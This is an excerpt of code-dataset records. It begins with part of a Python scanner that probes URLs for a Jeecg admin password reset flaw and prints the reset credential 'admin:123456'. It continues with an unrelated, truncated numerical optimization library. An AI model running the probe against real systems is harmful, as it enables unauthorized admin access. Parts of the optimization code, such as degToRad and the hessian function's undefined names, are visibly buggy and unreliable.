urls:\n url = i.rstrip(\"\\n\")\n payload = \"/loginController.do?goPwdInit\"\n vulnurl = url + payload\n try:\n req = requests.get(vulnurl, timeout=10, verify=False)\n if r\"loginController.do?pwdInit\" in req.text:\n print(\"[+]存在jeecg 重置admin密码漏洞...(高危)\\tpayload: \" + vulnurl + \"\\tadmin:123456\", \"red\")\n with open('漏洞.txt', 'a')as f:\n f.write(str(vulnurl) + '\\n')\n else:\n print(\"[-]不存在jeecg_pwd_reset漏洞\", \"white\", \"on_grey\")\n\n except:\n print(\"[-] \" + __file__ + \"====>可能不存在漏洞\", \"cyan\")\n","sub_path":"Jeecg-快速开发平台/Jeecg-快速开发平台.py","file_name":"Jeecg-快速开发平台.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384666254","text":"import sympy as 
sy\nimport numpy as np\nimport random\nfrom sympy import *\nimport FunctionApproximation as approx\nimport scipy.optimize\nimport scipy\nimport CustomPlots\nimport math\n#from sympy.mpmath import *\n\ndef vlen(inputs):\n\ttotalSquared = 0\n\tfor input in inputs:\n\t\ttotalSquared += input*input\n\tresult = math.sqrt(totalSquared)\n\treturn result\n\ndef degToRad(deg):\n\trad = deg/360.0\n\treturn rad\n\ndef make2dList(rows, cols):\n\ta=[]\n\tfor row in xrange(rows): a += [[0]*cols]\n\treturn a\n\ndef variableSymbols(variables):\n\tif variables:\n\t\tvariableSymbols = []\n\t\tif isinstance(variables[0],str) == True:\n\t\t\tfor variable in variables:\n\t\t\t\tvariableSymbols.append(symbols(variable))\n\t\telse:\n\t\t\tvariableSymbols = variables\n\n\treturn variableSymbols\n\ndef expressionSymbols(expression):\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\treturn expression\n\ndef gradient(function,inputs,delta=0.0001,normalize=False):\n\t'''returns a list of partial gradients of the function around the input point'''\n\t# Inputs: function is a python function that accepts only a list of inputs as arguments\n\t# Inputs is a list representing the point at which to evaluate the function.\n\t# Optional: delta is the numerical step size of the gradient approximation\n\t# Normalize returns the slope of each partial of the gradient divided by the total slope\n\n\tslopeValues = []\n\tfor i in range(0,len(inputs)):\n\t\tnegativeInputs = list(inputs)\n\t\tnegativeInputs[i] = float(negativeInputs[i]) - float(delta)\n\t\tnegativePoint = function(negativeInputs)\n\n\t\tpositiveInputs = list(inputs)\n\t\tpositiveInputs[i] = float(positiveInputs[i]) + float(delta)\n\t\tpositivePoint = function(positiveInputs)\n\n\t\tslope = (positivePoint - negativePoint)/(2*delta)\n\t\tslopeValues.append(slope)\n\n\tif normalize == True:\n\t\ttotalSlope = vlen(slopeValues)\n\t\tfor i in range(0,len(slopeValues)):\n\t\t\tslopeValues[i] = 
slopeValues[i]/totalSlope\n\treturn slopeValues\n\ndef hessian(expression,variables):\n\tn = len(variables)\n\tH = make2dList(n, n)\n\n\t# Core iteration function\n\tfor i in range(0,n):\n\t\tfirstPartial = diff(expression,variableSymbol[i])\n\t\tfor j in range(0,n):\n\t\t\tif i > j:\n\t\t\t\tH[i][j] = H[j][i]\n\t\t\telse:\n\t\t\t\tH[i][j] = diff(firstPartial,variableSymbol[j])\n\n\treturn H\n\ndef steepestDescentMinimum(function,startingPoint,epsilon=0.0001,nMax=100,damping=1,echo=False,parabolaFitStepSize = 0.1,constantStepSize = 0.1,**kwargs):\n\t'''minimizes output of function using steepest descent method'''\n\t# Inputs: python function which returns a single value and takes an input of a list of values\n\t# Variables is a list of text inputs for each input variable\n\t# StartingPoint is a vector of intial points for each input variable\n\t# Convergence and timeout parameters are optional\n\talpha = [-parabolaFitStepSize,0,parabolaFitStepSize]\n\ti = 0\n\n\t# Loop\n\tshouldContinue = True\n\tposition = startingPoint\n\tobjectiveValue = function(position)\n\t# print(\"starting loop...\")\n\t# Print current iteration results\n\tif echo == True:\n\t\theaderString = \"Iteration\\tPosition\\t\"\n\t\theaderString += \"Gradient\\t\"\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\n\twhile shouldContinue == True:\n\t\ti = i+1\n\t\t# Get gradient at position\n\t\t# print(\"About to get gradient\")\n\t\tslopeList = gradient(function,position)\n\t\t# print(\"fitting polynomial...\")\n\t\t# Get three points in that direction at positions of alpha\n\t\tfunctionValues = []\n\t\tfor alphaValue in alpha:\n\t\t\ttestLocation = []\n\t\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\t\ttestLocation.append(oldPosition-slope*alphaValue)\n\t\t\tfunctionValues.append(function(testLocation))\n\t\t# Fit parabola to curve\n\t\tC = approx.threePointQuadraticApprox(alpha, functionValues)\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives 
minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. Minimum alpha value is not bounded.\")\n\t\t\talphaStar = constantStepSize\n\t\telif abs(C[2]) < 0.001:\n\t\t\tprint(\"Shallow gradient, using constant step size\")\n\t\t\talphaStar = constantStepSize\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\t# Move to position of calculated alpha\n\t\tnewPosition = []\n\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\tnewPosition.append(oldPosition-slope*damping*alphaStar)\n\t\tlastPosition = position\n\t\tposition = newPosition\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = function(position)\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(i)\n\t\t\tresultsString += \"{}\\t\".format(position)\n\t\t\tresultsString += \"{}\\t\".format(slopeList)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif abs(deltaObjective) <= epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif i > nMax:\n\t\t\tprint(\"Function timed out. 
Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tprint(\"Position is:\")\n\tprint(position)\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\treturn (objectiveValue, position)\n\ndef SLP(expression,variables,startingPoint,inequalityConstraints=[],epsilon=0.0001,nMax=100,stepMax = 0.5,saveSequence=False,echo=False):\n\t# Outputs: optimum position\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\n\tshouldContinue = True\n\tposition = startingPoint\n\tobjectiveValue = evaluateExpression(expression, variables = variables, values = position)\n\tif echo == True:\n\t\theaderString = \"Iteration\\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += \"%s\\t\" % (variable)\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\tdesignSequence = [position]\n\n\tn = 0\n\ttaylorCoeffs = [0]*len(inequalityConstraints)\n\tb = [0]*len(inequalityConstraints)\n\n\twhile shouldContinue == True:\n\t\tn = n + 1\n\t\toldPosition = list(position)\n\n\t\t# Linearize objective function and constraints\n\t\t(expressionCoeffs,intercept) = approx.taylorLinearize(expression,variables = variables, values = position)\n\t\texpressionCoeffs = np.array(expressionCoeffs)\n\t\tfor i in range(0,len(inequalityConstraints)):\n\t\t\t(taylorCoeffs[i],b[i]) = approx.taylorLinearize(inequalityConstraints[i],variables = variables, values = position)\n\n\t\ttaylorArray = np.array(taylorCoeffs)\n\t\t# Solve linear problem\n\t\tres = scipy.optimize.linprog(expressionCoeffs,A_ub=taylorArray,b_ub=b)\n\t\t#print(res)\n\t\t# Exctract optimum from result\n\t\tnewOptimum = res.get(\"fun\", -9999)\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = newOptimum\n\t\t# Extract optimized design from result\n\t\tnewPosition = res.get(\"x\",[-9999]*len(variables))\n\t\tnewPosition = newPosition.tolist()\n\n\t\t# Check movement delta for each variable\n\t\tfor i in range(0,len(variables)):\n\t\t\tdelta = newPosition[i] - 
position[i]\n\t\t\tif abs(delta)> stepMax:\n\t\t\t\t#print(\"New position is a large move\")\n\t\t\t\t#print(\"Former position: \" + str(position[i]))\n\t\t\t\tposition[i] = position[i] + delta/abs(delta)*stepMax\n\t\t\t\t#print(\"Optimum position: \" + str(newPosition[i]))\n\t\t\t\t#print(\"Chosen move position: \" + str(position[i]))\n\t\t\telse:\n\t\t\t\tposition[i] = newPosition[i]\n\t\t\t\t#print(\"New position is a valid move\")\n\t\tdesignSequence.append(list(position))\n\n\t\t# Check convergence\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(n)\n\t\t\tfor value in position:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Last position: \" + str(oldPosition))\n\t\t#print(\"Current position: \" + str(position))\n\t\tvariableDeltas = [abs(old - new) for old, new in zip(oldPosition,position)]\n\t\t#print(variableDeltas)\n\t\tdeltaVar = max(variableDeltas)\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif (abs(deltaObjective) <= epsilon and deltaVar <= epsilon):\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif n > nMax:\n\t\t\tprint(\"Function timed out. 
Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,position):\n\t\tprint(variable + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\n\tif saveSequence == True:\n\t\tprint(designSequence)\n\t\tdesignSequence = np.array(designSequence)\n\t\tx = np.arange(0,3,0.1)\n\t\ty = np.arange(0,3,0.1)\n\t\tz = make2dList(len(y),len(x))\n\t\tconstraintValues = []\n\t\tfor i in range(0,len(inequalityConstraints)):\n\t\t\tconstraintValues.append(make2dList(len(y),len(x)))\n\t\tfor i in range(0,len(x)):\n\t\t\tfor j in range(0,len(y)):\n\t\t\t\tz[j][i] = evaluateExpression(expression,variables = variables,values = [x[i],y[j]])\n\t\t\t\tfor n in range(0,len(inequalityConstraints)):\n\t\t\t\t\tconstraintValues[n][j][i] = evaluateExpression(inequalityConstraints[n],variables = variables,values = [x[i],y[j]])\n\t\tCustomPlots.plotConstrainedContour(x,y,z,\"DesignSequence\",constraints=constraintValues,lineArray = designSequence)\n\n\treturn (objectiveValue, position)\n\ndef augmentedLagrange(expression,variables,equalityConstraints = [], x0 = [],l0 = 0,epsilon=0.0001,nMax=100,damping=1.0,rp=1.0,echo=False,**kwargs):\n\t# Inputs: expression is a text string or sympy expression for the objective function\n\t# Variables is a list of text inputs for each input variable\n\t# StartingPoint is a vector of intial points for each input variable\n\t# Convergence and timeout parameters are optional\n\talpha = [0,1,2]\n\ti = 0\n\tl = [l0]*len(equalityConstraints)\n\tconstraintValues = [0]*len(equalityConstraints)\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\tobjectiveExpression = expression\n\n\tequalityConstraints = [sy.sympify(constraint) for constraint in equalityConstraints]\n\n\t#if len(x0) == 0:\n\t\t# Calculate starting point from initial lagrange function\n\n\t# Loop\n\tshouldContinue = True\n\tposition = x0\n\tobjectiveValue = 
evaluateExpression(expression, variables = variables, values = position)\n\t#print(\"F = %2.6f\" % (objectiveValue))\n\t# print(\"About to start loop\")\n\t# Print current iteration results\n\tif echo == True:\n\t\theaderString = \"Iteration\\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += \"%s\\t\" % (variable)\n\t\tfor i in range(0,len(l)):\n\t\t\theaderString += \"L%i\\t\" % (i+1)\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\theaderString += \"h%i\\t\" % (i+1)\n\t\theaderString += \"Phi(x)\"\n\t\tprint(headerString)\n\n\tn = 0\n\twhile shouldContinue == True:\n\t\tn = n+1\n\n\t\t# Construct expression for augmented lagrange function\n\n\t\texpression = objectiveExpression\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\texpression = expression + rp*equalityConstraints[i]*equalityConstraints[i] + l[i]*equalityConstraints[i]\n\t\t#print(expression)\n\n\t\tslopeList = getGradient(expression,variables,position,normalize=False)\n\n\t\t# Get three points in that direction at intervals of 0,0.1,0.2\n\t\tfunctionValues = [objectiveValue]\n\t\tfor alphaValue in alpha:\n\t\t\tif alphaValue != alpha[0]:\n\t\t\t\ttestLocation = []\n\t\t\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\t\t\ttestLocation.append(oldPosition+slope*alphaValue)\n\t\t\t\tfunctionValues.append(evaluateExpression(expression, variables = variables, values = testLocation))\n\t\t# Fit parabola to curve\n\t\tC = approx.threePointQuadraticApprox(alpha, functionValues)\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. 
Minimum alpha value is not bounded.\")\n\t\t\talphaStar = 0.1\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\t# Move to position of calculated alpha\n\t\tnewPosition = []\n\t\tfor oldPosition, slope in zip(position,slopeList):\n\t\t\tnewPosition.append(oldPosition+slope*damping*alphaStar)\n\t\tlastPosition = position\n\t\tposition = newPosition\n\t\tobjectiveValueLast = objectiveValue\n\t\tobjectiveValue = evaluateExpression(expression, variables = variables, values = position)\n\n\t\t# Update lagrange multipliers\n\t\tfor i in range(0,len(equalityConstraints)):\n\t\t\tconstraintValues[i] = evaluateExpression(equalityConstraints[i], variables = variables, values = position)\n\t\t\tl[i] = l[i] + 2*rp*constraintValues[i]\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(n)\n\t\t\tfor value in position:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tfor value in l:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tfor value in constraintValues:\n\t\t\t\tresultsString += \"%2.4f\\t\" % (value)\n\t\t\tresultsString += \"%2.6f\" % (objectiveValue)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tdeltaObjective = objectiveValueLast - objectiveValue\n\t\t#print(\"Delta Objective = %2.4f\" % (float(deltaObjective)))\n\t\tif abs(deltaObjective) <= epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\n\t\t#print(\"About to check iteration maximum\")\n\t\tif n > nMax:\n\t\t\tprint(\"Function timed out. 
Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,position):\n\t\tprint(variable + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (objectiveValue))\n\treturn (objectiveValue, position)\n\ndef quasiNewtonMinimization(expression,variables, startingPoint,epsilon=0.0001,nMax=100,method='bfgs',echo=False):\n\tx = startingPoint\n\ti = 0\n\tshouldContinue = True\n\tn = len(variables)\n\tA = np.identity(n)\n\talphaTestPoints = [0,0.1,0.2]\n\tfTestPoints = [0,0,0]\n\tf = 99999\n\tdelFOld = np.asarray([0,0])\n\texpression = expressionSymbols(expression)\n\tvariables = variableSymbols(variables)\n\txNew = [0,0]\n\txOld = [0,0]\n\tif echo == True:\n\t\theaderString = \"Iteration \\t\"\n\t\tfor variable in variables:\n\t\t\theaderString += str(variable) + \" \\t\"\n\t\theaderString += \"F(x)\"\n\t\tprint(headerString)\n\n\twhile shouldContinue == True:\n\t\t(slope, delF) = getGradient(expression,variables,x)\n\t\tdelF = [-delElement for delElement in delF] # Look downhill rather than uphill\n\t\tdelF = np.asarray(delF)\n\n\t\t# Calculate values for alpha Star\n\t\tj = 0\n\t\tfor alphaTest in alphaTestPoints:\n\t\t\t\txTestPoint = x + alphaTest*(np.dot(A,delF))\n\t\t\t\tfTestPoints[j] = evaluateExpression(expression,variables = variables,values = xTestPoint)\n\t\t\t\tj = j + 1\n\n\t\tC = approx.threePointQuadraticApprox(alphaTestPoints,fTestPoints)\n\n\t\t# Check parabola is concave up\n\t\t# Calculate alpha that gives minimum\n\t\talphaStar = 0.0\n\t\tif C[2] < 0:\n\t\t\tprint(\"Fitted parabola is concave down. 
Minimum alpha value is not bounded.\")\n\t\t\talphaStar = 0.1\n\t\telse:\n\t\t\t(alphaStar,bestY) = minimizeParabola(C)\n\t\txNew = x + alphaStar*(np.dot(A,delF))\n\t\txOld = x\n\t\tx = xNew\n\n\t\t# Calculate new A matrix\n\t\tif method == 'bfgs':\n\t\t\tp = [xElement - xOldElement for xElement, xOldElement in zip(x, xOld)] # Nx1 vector\n\t\t\ty = delF - delFOld # Nx1 vector\n\t\t\tsigma = np.dot(np.transpose(p),y) # Scalar\n\t\t\ttau = np.dot(np.dot(np.transpose(y),A),y) # Scalar\n\t\t\tD = (sigma+tau)/(sigma*sigma)*np.dot(p,np.transpose(p)) - 1/sigma*(np.dot(np.dot(A,y),np.transpose(p)) + np.dot(p,np.transpose(np.dot(A,y))))\n\t\t\tA = A + D\n\t\telif method == 'DFP':\n\t\t\tprint(\"Implementation of DFP still needed\")\n\t\telse:\n\t\t\tprint(\"No method selected in quasiNewtonMinimization\")\n\n\t\tfNew = evaluateExpression(expression,variables = variables,values = x)\n\t\tfDelta = f - fNew\n\t\tf = fNew\n\t\tdelFOld = delF\n\t\ti = i + 1\n\n\t\t# Print current iteration results\n\t\tif echo == True:\n\t\t\tresultsString = \"%i \\t\" %(i)\n\t\t\tfor variable, value in zip(variables,x):\n\t\t\t\tresultsString += \"%2.4f \\t\" % (value)\n\t\t\tresultsString += \"%2.6f\\t\" % (f)\n\t\t\tprint(resultsString)\n\n\t\t# Check convergence\n\t\tif abs(fDelta) < epsilon:\n\t\t\tshouldContinue = False\n\t\t\tprint(\"Local Optimium found\")\n\t\tif i > nMax:\n\t\t\tprint(\"Function timed out. 
Returning final result\")\n\t\t\tshouldContinue = False\n\n\tprint(\"#### - Results - ####\")\n\tfor variable, variableValue in zip(variables,x):\n\t\t\tprint(str(variable) + \" = %2.6f\" % (variableValue))\n\tprint(\"F = %2.6f\" % (f))\n\n\treturn (f, x)\n\ndef NewtonRaphson1DFindZeroUnconstrained(functionString,xStart,tolerance=0.0001,maxIterations=100,echo=False):\n\txSymbolic = symbols('x')\n\tobjectiveExpression = sy.sympify(functionString)\n\t#print(objectiveExpression)\n\tobjectivePrime = diff(objectiveExpression, xSymbolic)\n\t#print(objectivePrime)\n\n\tx = xStart\n\tshouldContinue = True\n\tepislon = 1000\n\ti = 0\n\tif echo==True:\n\t\tprint(\"Iter \\t X \\t F \\tF'\")\n\n\twhile shouldContinue == True:\n\t\ti = i + 1\n\t\tf = evaluateExpression(objectiveExpression, [xSymbolic],[x])\n\t\tfPrime = evaluateExpression(objectivePrime, [xSymbolic],[x])\n\t\txNew = x - f/fPrime\n\t\t#print(f)\n\t\t#print(fPrime)\n\n\t\tepsilon = abs(xNew - x)\n\n\t\tx = xNew\n\n\t\tif epsilon <= tolerance or i >= maxIterations:\n\t\t\tshouldContinue = False\n\t\tif echo==True:\n\t\t\tprint(\"%i \\t %2.4f \\t %2.4f \\t %2.4f\" % (i, x,f,fPrime))\n\n\treturn x\n\ndef NewtonRaphson1DFindMinUnconstrained(functionString,xStart,tolerance=0.0001,maxIterations=100):\n\txSymbolic = symbols('x')\n\tobjectiveExpression = sy.sympify(functionString)\n\t#print(objectiveExpression)\n\tobjectivePrime = diff(objectiveExpression, xSymbolic)\n\t#print(objectivePrime)\n\tobjectiveDoublePrime = diff(objectivePrime, xSymbolic)\n\t#print(objectiveDoublePrime)\n\tx = xStart\n\tshouldContinue = True\n\tepislon = 1000\n\ti = 0\n\n\twhile shouldContinue == True:\n\t\ti = i + 1\n\t\tf = evaluateExpression(expression = objectiveExpression, x = x)\n\t\tfPrime = evaluateExpression(expression = objectivePrime, x = x)\n\t\tfDoublePrime = evaluateExpression(expression = objectiveDoublePrime, x = x)\n\t\txNew = x - fPrime/fDoublePrime\n\t\t#print(f)\n\t\t#print(fPrime)\n\n\t\tepsilon = abs(xNew - x)\n\n\t\tx = 
xNew\n\n\t\tif epsilon <= tolerance or i >= maxIterations:\n\t\t\tshouldContinue = False\n\t\tprint(\"Iteration = %i, X = %2.4f, F = %2.4f, F' = %2.4f\" % (i, x,f,fPrime))\n\n\terror = evaluateExpression(expression = objectiveExpression, x = x)\n\n\treturn x\n\ndef evaluateExteriorPenalty(function, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[], rp=1):\n\t\"\"\"returns a float at the location selected with constraint penalties\"\"\"\n\n\tobjectiveValue = function(position)\n\n\tpenalty_total = 0\n\tfor constraint in inequalityConstraints:\n\t\tpenalty = constraint(position)\n\t\tpenalty = max(0,penalty)**2\n\t\tpenalty_total += penalty\n\n\tfor constraint in equalityConstraints:\n\t\tpenalty = constraint(position)**2\n\t\tpenalty_total += penalty\n\n\ttotalValue = objectiveValue + rp * penalty_total\n\tresult = totalValue\n\n\treturn result\n\ndef evaluateLinearExtendedPenalty(\n\tfunction, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1.0,\n\tepsilon = -9999):\n\t\"\"\"returns a float at the location selected with constraint penalties\"\"\"\n\n\tif epsilon == -9999:\n\t\tepsilon = -0.2*np.sqrt(1/rp)\n\n\trpPrime = 1/rp\n\tobjectiveValue = function(position)\n\n\tinconstraintValue = 0\n\tfor constraint in inequalityConstraints:\n\t\tnewConstraintValue = constraint(position)\n\t\tif newConstraintValue > epsilon:\n\t\t\tinconstraintValue += - (2*epsilon - newConstraintValue)/epsilon**2\n\t\telse:\n\t\t\tinconstraintValue = inconstraintValue - 1/newConstraintValue\n\n\tconstraintValue = 0\n\tfor constraint in equalityConstraints:\n\t\tnewConstraintValue = constraint(position)**2\n\t\tconstraintValue = constraintValue + newConstraintValue\n\n\ttotalValue = objectiveValue + inconstraintValue/rp + constraintValue*rp\n\tresult = totalValue\n\n\treturn result\n\ndef evaluateInteriorInverseBarrierPenalty(\n\tfunction, position,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1.0):\n\t\"\"\"returns a float at the 
location selected with constraint penalties\"\"\"\n\n\tobjectiveValue = function(position)\n\n\tineq_constraint_penalty = 0\n\tfor constraint in inequalityConstraints:\n\t\tconstraint_value = constraint(position)\n\t\tif ineq_constraint_penalty <= 0:\n\t\t\tineq_constraint_penalty += - 1/constraint_value\n\t\telse:\n\t\t\tineq_constraint_penalty += 100*rp * constraint_value\n\n\teq_constraint_penalty = 0\n\tfor constraint in equalityConstraints:\n\t\tconstraint_value = constraint(position)**2\n\t\teq_constraint_penalty += constraint_value\n\n\tresult = objectiveValue + ineq_constraint_penalty/rp + rp * eq_constraint_penalty\n\n\treturn result\n\ndef constrainedMinimum(function,startingPoint,\n\tinequalityConstraints=[],\n\tequalityConstraints=[],\n\trp=1,\n\tmethod='ExteriorPenalty',\n\techo=False,\n\tdamping=0.1,\n\tepsilon=0.0001,\n\tnMax=100,\n\tparabolaFitStepSize = 0.1,\n\tconstantStepSize = 0.1,\n\tprintResults=True,\n\t**kwargs):\n\t'''minimizes the given function for n variables subject to boundary constraints'''\n\t# Input: function whose only argument is a list of values and which returns a single value\n\t# StartingPoint is a list of values corrosponding to the number of variables\n\t# Constraints are functions which take a list of values and return a single value\n\t# Inequality constraints return less than 0 when valid, equality equal 0\n\t# Method options: 'ExteriorPenalty', 'InteriorPenalty', 'InteriorInverseBarrier','InverseLog', 'InteriorLinearExtended', 'QuadraticExtended'\n\tif method == 'ExteriorPenalty':\n\t\tpenalizedFunction = lambda position: evaluateExteriorPenalty(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp)\n\telif method == 'InteriorLinearExtended':\n\t\tpenalizedFunction = lambda position: 
evaluateLinearExtendedPenalty(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp,\n\t\t\tepsilon = -9999)\n\telif method == 'InteriorInverseBarrier':\n\t\tpenalizedFunction = lambda position: evaluateInteriorInverseBarrier(function,\n\t\t\tinequalityConstraints=inequalityConstraints,\n\t\t\tequalityConstraints=equalityConstraints,\n\t\t\tposition = position,\n\t\t\trp = rp)\n\telse:\n\t\tprint('The method ' + method + ' is not implemented yet.')\n\t\treturn\n\t(optimum, position) = steepestDescentMinimum(penalizedFunction, startingPoint,\n\tepsilon=epsilon,\n\tnMax=nMax,\n\tdamping=damping,\n\techo=echo,\n\tparabolaFitStepSize = parabolaFitStepSize,\n\tconstantStepSize = constantStepSize,**kwargs)\n\n\treturn (optimum, position)\n\ndef minimizeCubic(c):\n\t# Inputs: Coefficients for polynomial equation according to the form C0 + C1*x + C2*x^2 + C3*x^3\n\t# Outputs: Values of x and y where y is minimized\n\ta = 3*c[3]\n\tb = 2*c[2]\n\td = c[1]\n\tinsideSqareroot = np.float64(b*b-4*a*d)\n\tif insideSqareroot < 0:\n\t\tprint(\"Minimize Cubic function encountered imaginary square root. 
Aborting.\")\n\t\treturn\n\tx1 = (-b+np.sqrt(insideSqareroot))/(2*a)\n\tx2 = (-b-np.sqrt(insideSqareroot))/(2*a)\n\n\tx = 0\n\ty = 0\n\n\ty1 = approx.getValueOfPoly(c,x1)\n\ty2 = approx.getValueOfPoly(c,x2)\n\tif y1 < y2:\n\t\tx = x1\n\t\ty = y1\n\telif y1 > y2:\n\t\tx = x2\n\t\ty = y1\n\telse:\n\t\tx = x1\n\t\ty = y1\n\t\tprint(\"More than one solution in Minimize Cubic\")\n\n\treturn (x,y)\n\ndef minimizeParabola(c):\n\t# Inputs: Coefficients for polynomial equation according to the form C0 + C1*x + C2*x^2...\n\t# Outputs: Values of x and y where y is minimized\n\tminX = -c[1]/(2*c[2])\n\n\tminY = approx.getValueOfPoly(c,minX)\n\treturn (minX,minY)\n\ndef convertToPenaltyFunction(coreFunction,constraints,R=1):\n\tconstraintsToSum = []\n\tnewObjective = coreFunction + \" - %2.4f*(\" % (R)\n\tfor i in range(0,len(constraints)):\n\t\tconstraint = constraints[i]\n\t\tif i == 0:\n\t\t\tnewObjective = newObjective + \"1/(\" + constraint + \")\"\n\t\telse:\n\t\t\tnewObjective = newObjective + \" + 1/(\" + constraint + \")\"\n\n\n\tnewObjective = newObjective + \")\"\n\treturn newObjective\n\ndef goldenSectionSearch(expression,xlow,xu,epsilon = 0.001,n=100,echo=False):\n\ttau = 0.381966\n\n\tif isinstance(expression, str):\n\t\texpression = sy.sympify(expression)\n\n\tfu = evaluateExpression(expression,variables = ['x'], values = [xu])\n\tflow = evaluateExpression(expression,variables = ['x'], values = [xlow])\n\n\tx1 = (1-tau)*xlow + tau*xu\n\tf1 = evaluateExpression(expression,variables = ['x'], values = [x1])\n\tx2 = tau*xlow + (1-tau)*xu\n\tf2 = evaluateExpression(expression,variables = ['x'], values = [x2])\n\n\tk = 3\n\tshouldContinue = True\n\n\twhile shouldContinue == True:\n\n\t\tif f1 > f2:\n\t\t\txlow = x1\n\t\t\tflow = f1\n\t\t\tx1 = x2\n\t\t\tf1 = f2\n\t\t\tx2 = tau*xlow + (1-tau)*xu\n\t\t\tf2 = evaluateExpression(expression,variables = ['x'], values = [x2])\n\t\telse:\n\t\t\txu = x2\n\t\t\tfu = f2\n\t\t\tx2 = x1\n\t\t\tf2 = f1\n\t\t\tx1 = (1-tau)*xlow + 
tau*xu\n\t\t\tf1 = evaluateExpression(expression,variables = ['x'], values = [x1])\n\n\t\tk = k + 1\n\t\tif echo == True:\n\t\t\tprint(\"i = %i \\t xLow = %2.4f \\t F(xLow) = %2.4f \\t xHigh = %2.4f \\t F(xHigh) = %2.4f\" % (k,xlow,flow,xu,fu))\n\n\t\tif k > n:\n\t\t\tshouldContinue = False\n\t\tif xu - xlow < epsilon:\n\t\t\tshouldContinue = False\n\tfs = [f1,f2,flow,fu]\n\txs = [x1,x2,xlow,xu]\n\tfMin = min(fs)\n\txMin = xs[fs.index(fMin)]\n\n\treturn(fMin,xMin)\n\ndef randomSeaoptimimrch2D(objectiveFunction,xStart,yStart,constraints,tolerance=0.0001, maxIterations=100):\n\tobjectiveExpression = sy.sympify(objectiveFunction)\n\tconstraintExpressions = []\n\tfor constraint in constraints:\n\t\tconstraintExpressions.append(sy.sympify(constraint))\n\n\t# Variable initializations\n\txBest = 999999999.9\n\tyBest = 999999999.9\n\tobjectiveBest = 9999999.9999\n\tx = xStart\n\ty = yStart\n\tepsilon = 100\n\tshouldContinue = True\n\ti = 0\n\tsinceLastPrint = 0\n\tprintInterval = 100\n\n\t# Iteration loop\n\twhile shouldContinue == True:\n\t\ti = i+1\n\t\tsinceLastPrint = sinceLastPrint + 1\n\t\tif sinceLastPrint >= printInterval:\n\t\t\tprint(\"Running Iteration %i\" %(i))\n\t\t\tsinceLastPrint = 0\n\n\t\txNew = x + random.uniform(-0.1, 0.1)\n\t\tyNew = y + random.uniform(-0.1,0.1)\n\t\tobjectiveNew = evaluateExpression(objectiveExpression,x=xNew,y=yNew)\n\t\tvalidPoint = True\n\t\tif objectiveNew < objectiveBest:\n\t\t\tfor g in constraintExpressions:\n\t\t\t\tif evaluateExpression(expression=g,x=x,y=y) > 0:\n\t\t\t\t\tvalidPoint = False\n\n\t\t\tif validPoint == True:\n\t\t\t\t# Move and store new 